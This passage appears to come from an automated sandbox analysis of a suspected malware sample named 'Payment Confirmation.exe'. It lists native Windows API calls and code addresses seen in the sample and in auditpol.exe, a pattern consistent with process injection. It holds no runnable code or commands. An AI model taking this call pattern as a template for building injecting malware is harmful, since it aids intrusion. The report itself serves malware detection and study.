                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12FB0 NtResumeThread
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12FE0 NtCreateFile
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12F30 NtCreateSection
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A12E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A13090 NtSetValueKey
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A13010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A139B0 NtGetContextThread
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A13D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A13D70 NtOpenThread
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D04340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D04650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D035C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D039B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D02C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D03090 NtSetValueKey
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D03010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D03D70 NtOpenThread
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03D03D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03329790 NtDeleteFile
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_033296A0 NtReadFile
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03329530 NtCreateFile
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_033299A0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\auditpol.exe; Code function: 10_2_03329840 NtClose
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_015BE054
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_05719260
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_0571925A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07530006
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07576420
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_075784D8
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_075793A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07575DDA
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07575DE8
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07576412
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_0757FB48
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_0757FB38
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07570006
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A1757
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A1768
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A2108
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A5100
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A2118
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A6CA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A0006
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A001A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A0040
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_078A0478
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_0757CF5A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07579320
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 3_2_07570040
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00418C13
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00401C18
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_004031E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00401240
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0041034A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00410353
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0042F303
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0040E553
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00410573
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00404535
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00416DFE
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00402D8B
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00402D90
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00416E03
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_00404635
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0040E698
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_0040E6A3
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AA01AA
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A941A2
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A981CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019D0100
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A68158
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AA03E6
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9A352
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A602C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AA0591
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A8E4F6
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A84420
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A92446
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019DC7C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A04750
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019FC6E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AAA9A6
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019F6962
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019C68B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A0E8F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E2840
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019EA840
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A96BD7
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9AB40
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019F8DBF
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019DADE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019EAD00
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A7CD1F
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A80CB5
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019D0CF2
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E0C00
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A5EFA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019D2FC8
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019ECFE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A22F28
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A00F30
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A82F30
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A54F40
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019F2E90
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9CE93
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9EEDB
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9EE26
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E0E59
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019EB1B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AAB16B
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A1516C
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019CF172
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A970E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9F0E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E70C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A8F0CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A2739A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9132D
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019CD34C
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E52A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A812ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019FB2C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A7D5B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01AA95C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A97571
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9F43F
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019D1460
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A9F7B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A916CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A25630
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_01A75910
                Source: C:\Users\user\Desktop\Payment Confirmation.exe; Code function: 7_2_019E9950
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FB9507_2_019FB950
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E38E07_2_019E38E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4D8007_2_01A4D800
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FFB807_2_019FFB80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A55BF07_2_01A55BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1DBF97_2_01A1DBF9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FB767_2_01A9FB76
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A25AA07_2_01A25AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7DAAC7_2_01A7DAAC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A81AA37_2_01A81AA3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8DAC67_2_01A8DAC6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A53A6C7_2_01A53A6C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FA497_2_01A9FA49
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A97A467_2_01A97A46
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FFDC07_2_019FFDC0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A97D737_2_01A97D73
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E3D407_2_019E3D40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A91D5A7_2_01A91D5A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FCF27_2_01A9FCF2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A59C327_2_01A59C32
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E1F927_2_019E1F92
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FFB17_2_01A9FFB1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A3FD27_2_019A3FD2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A3FD57_2_019A3FD5
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FF097_2_01A9FF09
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E9EB07_2_019E9EB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDE3F010_2_03CDE3F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D903E610_2_03D903E6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8A35210_2_03D8A352
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D502C010_2_03D502C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7027410_2_03D70274
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D881CC10_2_03D881CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D901AA10_2_03D901AA
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D841A210_2_03D841A2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D5815810_2_03D58158
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC010010_2_03CC0100
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6A11810_2_03D6A118
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6200010_2_03D62000
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCC7C010_2_03CCC7C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CF475010_2_03CF4750
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD077010_2_03CD0770
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEC6E010_2_03CEC6E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9059110_2_03D90591
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD053510_2_03CD0535
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7E4F610_2_03D7E4F6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8244610_2_03D82446
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7442010_2_03D74420
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D86BD710_2_03D86BD7
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8AB4010_2_03D8AB40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCEA8010_2_03CCEA80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD29A010_2_03CD29A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9A9A610_2_03D9A9A6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE696210_2_03CE6962
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CFE8F010_2_03CFE8F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CB68B810_2_03CB68B8
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD284010_2_03CD2840
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDA84010_2_03CDA840
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC2FC810_2_03CC2FC8
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDCFE010_2_03CDCFE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D4EFA010_2_03D4EFA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D44F4010_2_03D44F40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D72F3010_2_03D72F30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D12F2810_2_03D12F28
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CF0F3010_2_03CF0F30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8EEDB10_2_03D8EEDB
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8CE9310_2_03D8CE93
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE2E9010_2_03CE2E90
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD0E5910_2_03CD0E59
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8EE2610_2_03D8EE26
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCADE010_2_03CCADE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE8DBF10_2_03CE8DBF
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6CD1F10_2_03D6CD1F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDAD0010_2_03CDAD00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC0CF210_2_03CC0CF2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D70CB510_2_03D70CB5
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD0C0010_2_03CD0C00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D1739A10_2_03D1739A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CBD34C10_2_03CBD34C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8132D10_2_03D8132D
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEB2C010_2_03CEB2C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D712ED10_2_03D712ED
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD52A010_2_03CD52A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDB1B010_2_03CDB1B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9B16B10_2_03D9B16B
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CBF17210_2_03CBF172
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D0516C10_2_03D0516C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD70C010_2_03CD70C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7F0CC10_2_03D7F0CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D870E910_2_03D870E9
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F0E010_2_03D8F0E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F7B010_2_03D8F7B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D816CC10_2_03D816CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D1563010_2_03D15630
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D995C310_2_03D995C3
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6D5B010_2_03D6D5B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8757110_2_03D87571
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC146010_2_03CC1460
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F43F10_2_03D8F43F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D45BF010_2_03D45BF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D0DBF910_2_03D0DBF9
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEFB8010_2_03CEFB80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FB7610_2_03D8FB76
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7DAC610_2_03D7DAC6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D15AA010_2_03D15AA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D71AA310_2_03D71AA3
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6DAAC10_2_03D6DAAC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FA4910_2_03D8FA49
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D87A4610_2_03D87A46
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D43A6C10_2_03D43A6C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD995010_2_03CD9950
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEB95010_2_03CEB950
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6591010_2_03D65910
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD38E010_2_03CD38E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D3D80010_2_03D3D800
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD1F9210_2_03CD1F92
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FFB110_2_03D8FFB1
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FF0910_2_03D8FF09
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD9EB010_2_03CD9EB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEFDC010_2_03CEFDC0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D81D5A10_2_03D81D5A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD3D4010_2_03CD3D40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D87D7310_2_03D87D73
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FCF210_2_03D8FCF2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D49C3210_2_03D49C32
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331208010_2_03312080
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330CED010_2_0330CED0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330CEC710_2_0330CEC7
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B22010_2_0330B220
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B21510_2_0330B215
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033011B210_2_033011B2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033010B210_2_033010B2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330D0F010_2_0330D0F0
